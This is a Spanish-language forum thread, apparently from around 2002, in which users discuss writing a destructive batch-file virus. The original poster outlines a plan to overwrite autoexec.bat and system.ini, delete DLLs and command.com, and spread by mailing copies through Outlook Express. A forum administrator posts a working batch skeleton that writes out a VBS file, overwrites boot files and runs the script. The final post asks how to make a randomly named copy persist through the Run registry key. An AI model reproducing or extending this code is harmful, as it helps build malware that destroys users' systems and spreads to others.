Resultados 1 al 14 de 14

Tema: programacion de virus bat

  1. #1 programacion de virus bat 
    Avanzado
    Fecha de ingreso
    Jul 2002
    Ubicación
    loopback
    Mensajes
    602
    Descargas
    0
    Uploads
    0
    como no hay seccion virus lo posteo aki

    pos vereis toy currandome un bat k seria lo siguiente:



    1- al ser ejecutado el bat crea un archivo en C:\windows\system llamado you can see.txt (sin espacios)

    2-la rutina del bat seria borrar el contenido de los archivos:

    autoexec.bat
    system.ini

    i llenarlos ocn el contenido:

    you can see

    tambien borrar del sistema los archivos:

    numerosas dll
    command.com

    pero antes de esto el bat tendria k crear un script de visual basic (.vbs)
    pero esto no lo se hacer con un bat, alguien me puede ayudar, es k si no creo el script de vb no puedo hacer k se propague por mail, lo k aria el script seria autoenviar copias del virus por outllock express (el codigo de un script de bsic k hiciera eso ya lo tengo escrito) i despues ejecutar un un bat creado por el primer bat, k es el k contiene la rutina destructiva.

    no se si me e explicado bien...

    en fin k mi duda es:

    ¿como se puede crear un script de basci desde un bat?

    enga un saludo!!!!!!
    Citar  
     

  2. #2  
    Moderador HH
    Fecha de ingreso
    Sep 2002
    Ubicación
    127.0.0.1
    Mensajes
    1.817
    Descargas
    3
    Uploads
    0
    sería mas facil crear "a mano" el script de vbs y hacer que se ejecute cuando se ejecuta el bat, con un programa de esos joiners que puedes unir mas de un archivo y que se abran a la vez. No se si existe la posibilidad de unir un bat con uno de esos scripts y hacer que se ejecuten al mismo tiempo, pero si existe no será muy dificil de encontrar
    Quien no sabe lo que busca no entiende lo que encuentra.
    Citar  
     

  3. #3  
    Avanzado
    Fecha de ingreso
    Jul 2002
    Ubicación
    loopback
    Mensajes
    602
    Descargas
    0
    Uploads
    0
    no, no existe k yo sepa, pero hay muchos virus k lo hacen asi k si alguien encuenta el codigo fuente de un virus en bat, por favor k mo lo haga saber, a ver si da ahy saco algo en claro
    Citar  
     

  4. #4  
    Emeritus HH-team Avatar de TseTse
    Fecha de ingreso
    Apr 2002
    Mensajes
    3.200
    Descargas
    1
    Uploads
    0
    Lo triste es que o no sabes ni que nombre tienen dichos virus o no te sale de los huevos buscarlo en google.
    http://www.google.com/search?q=batch...TF-8&hl=es&lr=
    Los virus que se crean usando un archivo *.bat (Batch Processing (DOS Batch File)) se conocen como Batch Virus.

    TseTse
    ' La corrupción, el síntoma más infalible de la libertad que otorga la Constitución '
    Citar  
     

  5. #5  
    Moderador HH
    Fecha de ingreso
    Sep 2002
    Ubicación
    127.0.0.1
    Mensajes
    1.817
    Descargas
    3
    Uploads
    0
    Tas muy alterado TseTse, necesitas unas vacaciones
    saludos
    Quien no sabe lo que busca no entiende lo que encuentra.
    Citar  
     

  6. #6  
    Avanzado
    Fecha de ingreso
    Jul 2002
    Ubicación
    loopback
    Mensajes
    602
    Descargas
    0
    Uploads
    0
    aer, tsetse tio por segunda vez:

    no me mates!!!!! (i no me metes otra vez el dibujo ese)

    pos ale, ya se hacerlo pero lo he pensao yo solo, por si alguien le interesa...

    echo (contenido del vbs sin parentesis) > ruta del vbs
    para la segunda linea:
    echo (lo mismo k antes) >> ruta del vbs i ya ta


    asi todas las lineas k kieras!
    Citar  
     

  7. #7  
    Administrador Foros HH
    Fecha de ingreso
    Nov 2001
    Ubicación
    Spain
    Mensajes
    2.235
    Descargas
    0
    Uploads
    0
    jur, yo de bat se un ratoillo jeje,y he echo virus, worms, floods y de todo un poco con batch, que me pillo la deria una vez xD. Pregunta lo que quieras pero q sea specifico y te hago el codigo, en un principio lo que pides tu es tan facil como:

    @echo off
    :init
    echo ViRuS XaPUZa
    echo Aqui es donde creo el VBS malicious :
    :vbs
    echo CODIGO QUE QUIERAS EN VBS > archivo.vbs
    echo CODIGO QUE QUIERAS EN VBS >> archivo.vbs
    echo CODIGO QUE QUIERAS EN VBS >> archivo.vbs
    echo CODIGO QUE QUIERAS EN VBS >> archivo.vbs
    echo CODIGO QUE QUIERAS EN VBS >> archivo.vbs
    cd C:\windows\system\
    echo you can see > youcansee.txt
    cd C:\
    echo you can see > autoexec.bat
    echo you can see > config.sys
    :exec
    echo ahora ejecutamos el vbs creado anteriormente
    start archivo.vbs

    Mas facil....batch parece simple, y en realidad lo es, pero tiene funciones muy interesantes y algo mas complejillas.
    Salu2
    Todos desean saber, pero pocos pagar el trabajo que vale.

    [[NORMAS DEL FORO]]
    Citar  
     

  8. #8  
    Avanzado
    Fecha de ingreso
    Jul 2002
    Ubicación
    loopback
    Mensajes
    602
    Descargas
    0
    Uploads
    0
    muchas gracias crackzme pero todo eso ya lo se hacer, pero gracias de todas formas...
    Citar  
     

  9. #9  
    Administrador Foros HH
    Fecha de ingreso
    Nov 2001
    Ubicación
    Spain
    Mensajes
    2.235
    Descargas
    0
    Uploads
    0
    Si lo sabes hacer para q lo preguntas melón, pregunta algo mas dificil entonces xD
    Todos desean saber, pero pocos pagar el trabajo que vale.

    [[NORMAS DEL FORO]]
    Citar  
     

  10. #10  
    Avanzado
    Fecha de ingreso
    Dec 2001
    Ubicación
    127.0.0.1
    Mensajes
    1.526
    Descargas
    1
    Uploads
    0
    jejejje lo qme ha gustado ha sido la indirecta de jocanor : "como no hay seccion de virus" xDDD
    Citar  
     

  11. #11  
    ramgo
    Invitado
    Jocanor, los hiciste postear, para ke eso ya lo supieras, como dice cracksme: si ya lo sabes hacer para ke preguntas.
    Citar  
     

  12. #12  
    Avanzado
    Fecha de ingreso
    Jul 2002
    Ubicación
    loopback
    Mensajes
    602
    Descargas
    0
    Uploads
    0
    a ver, lo postee, i despues lo averigue, pero el post ya estava puesto...
    ad+ siempre se parende algo ahora ya se a kien preguntarle en cuestion de virus.
    Citar  
     

  13. #13  
    Administrador Foros HH
    Fecha de ingreso
    Nov 2001
    Ubicación
    Spain
    Mensajes
    2.235
    Descargas
    0
    Uploads
    0
    weno, ntonces alfinal no tienes ninguna pregunta 'dificil' sobre batch, no?
    Todos desean saber, pero pocos pagar el trabajo que vale.

    [[NORMAS DEL FORO]]
    Citar  
     

  14. #14  
    Avanzado
    Fecha de ingreso
    Jul 2002
    Ubicación
    loopback
    Mensajes
    602
    Descargas
    0
    Uploads
    0
    sobre batch no, pero sobre vbscript si!!!

    verás...si hago un virus k se copie en el directorio \%windir%\ por ejemplo....i le pongo k el nombre lo elija al azar entre varios, como por ejemplo:

    cdefg.vbs
    rf3rgfre.vbs
    r3tg543543.vbs

    como hago luego la entrada en run para k se inicie cada vez k se encienda la makina?si no se el nombre k va a salir...
    Citar  
     

Temas similares

  1. Virus VIRUS: WIN32/INJECTOR.AV ayuda
    Por ebernaguz en el foro MALWARE
    Respuestas: 5
    Último mensaje: 15-04-2009, 08:53
  2. Avast detecta programa como virus sin ser virus
    Por tamaroque en el foro APLICACIONES
    Respuestas: 2
    Último mensaje: 07-01-2009, 21:27
  3. programacion
    Por diablo007x en el foro GENERAL
    Respuestas: 2
    Último mensaje: 16-12-2003, 19:32
  4. Programación
    Por Jesus en el foro GENERAL
    Respuestas: 4
    Último mensaje: 27-04-2003, 18:48
  5. ¿Programación de virus?
    Por .Yok3R. en el foro GENERAL
    Respuestas: 6
    Último mensaje: 13-04-2002, 00:02

Marcadores

Marcadores